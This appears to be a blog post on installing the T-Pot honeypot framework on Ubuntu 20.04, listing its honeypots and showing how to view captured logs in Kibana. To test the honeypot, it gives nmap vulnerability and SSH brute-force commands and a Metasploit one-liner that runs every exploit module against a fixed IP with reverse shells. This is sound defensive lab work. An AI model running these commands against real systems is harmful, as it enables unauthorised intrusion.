T-Pot is an open-source honeypot framework designed to emulate multiple attack surfaces and gather data on malicious activities. This blog post walks through the installation process on an Ubuntu 20.04 server, and demonstrates how to test its capabilities.
Setting Up T-Pot
System Requirements
- OS: Ubuntu Server 20.04
- Memory: 16 GB RAM
- CPU: 8 cores
- Disk: 128 GB SSD or HDD
- Allow numerous ports through the firewall
Installation Steps
Follow the official installation steps from the GitHub page:
- Update and install curl:
sudo apt update && sudo apt install -y curl htop vim net-tools && sudo apt upgrade -y- Run the T-Pot Installer Script: Download and execute the installation script:
env bash -c "$(curl -sL https://github.com/telekom-security/tpotce/raw/master/install.sh)"- Follow the Installation Prompts: Complete the prompts to set up T-Pot. After installation, Docker containers for the honeypots and monitoring stack (ELK) will be running. I’m running a standalone HIVE server.
- Reboot
- Access the Dashboard: Visit the T-Pot Kibana dashboard:
http://<server-ip>:64297/kibana/
This gets you the following honeypots:
adbhoney: Simulates Android Debug Bridge (ADB) to log unauthorized access attempts.
ciscoasa: Emulates Cisco ASA firewall services for intrusion detection.
citrixhoneypot: Mimics Citrix systems to capture exploit attempts.
conpot: Industrial control system (ICS) honeypot for SCADA protocols.
cowrie: SSH and Telnet honeypot to log and emulate attacker behavior.
ddospot: Detects and logs DDoS attacks.
dicompot: Simulates DICOM servers used in medical imaging to capture malicious activity.
dionaea: A honeypot to capture malware and emulate vulnerable services.
elasticpot: Mimics Elasticsearch to log exploit attempts.
endlessh: Endless SSH banner to delay and trap brute force attacks.
glutton: Multi-protocol honeypot for network services.
hellpot: Intentionally delays attackers to waste their time.
heralding: Credential capture honeypot for various network protocols.
honeypots: Generic container for managing multiple honeypots.
honeytrap: High interaction honeypot for logging and redirecting attacks.
ipphoney: Simulates printers to detect malicious network activity.
log4pot: Exploits targeting Log4j vulnerabilities are logged here.
mailoney: Mimics SMTP services to capture phishing and email attacks.
medpot: Medical device honeypot capturing unauthorized access attempts.
redishoneypot: Simulates Redis database to detect exploit attempts.
sentrypeer: SIP honeypot for VoIP intrusion detection.
snare: HTTP/HTTPS honeypot for web exploit detection.
tanner: Emulates web server attacks and exploits for logging.
wordpot: Simulates WordPress installations to log malicious activities.
Testing T-Pot with Nmap
Nmap Commands for Testing
- Vulnerability Scan:
nmap -Pn --script vuln <server-ip> - Targeted SSH Attack:
nmap -p 22 --script ssh-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <server-ip> - Simulated DDoS:
nmap --max-rate 10000 -Pn -p- <server-ip>
Testing T-Pot with Metasploit
Setup
- Generate an Exploit Resource File: I chained together some commands to dump the exploits, clean the output, grep the relevant details, and create a resource file with randomized bind ports. The exploits will default to a reverse shell:
msfconsole -q -x "search exploit; exit" | \
sed 's/\x1B\[[0-9;]*[a-zA-Z]//g' | \
grep -o 'exploit/[a-zA-Z0-9_/]*' | \
awk '/exploit\// {print "use " $1 "\nset RHOST 192.168.1.131\nset LPORT " \
int(1024 + rand()*64511) "\nrun"}' > run_all_exploits.rc- Hail Mary: Run the file within Metasploit to automate attacks:
msfconsole -r run_all_exploits.rcResults
- Access Kibana at https://<server_ip>:64297/ and review logs generated for all the probes/attacks.
You can view all container logs in Kibana. Here’s a cowrie example:
eventid:cowrie.command.input AND input:*
You can also replay ssh sessions with cowrie playlog
First get into the container:
docker exec -it <container_id> /bin/bashThen playback logs in log/tty/file
bin/playlog log/tty/4e737a85293d107a708fe878c77955076b054d1f4938ede25d8f89f656add64f
Conclusion
T-Pot is a robust platform for understanding and analyzing attack behaviors. By using tools like Nmap and Metasploit, you can test various attack scenarios and learn how T-Pot captures these interactions. Pair it with the Kibana interface to dive deep into the logs and identify potential patterns in adversarial behavior. Throw it out on the internet and enjoy the action.
0 Comments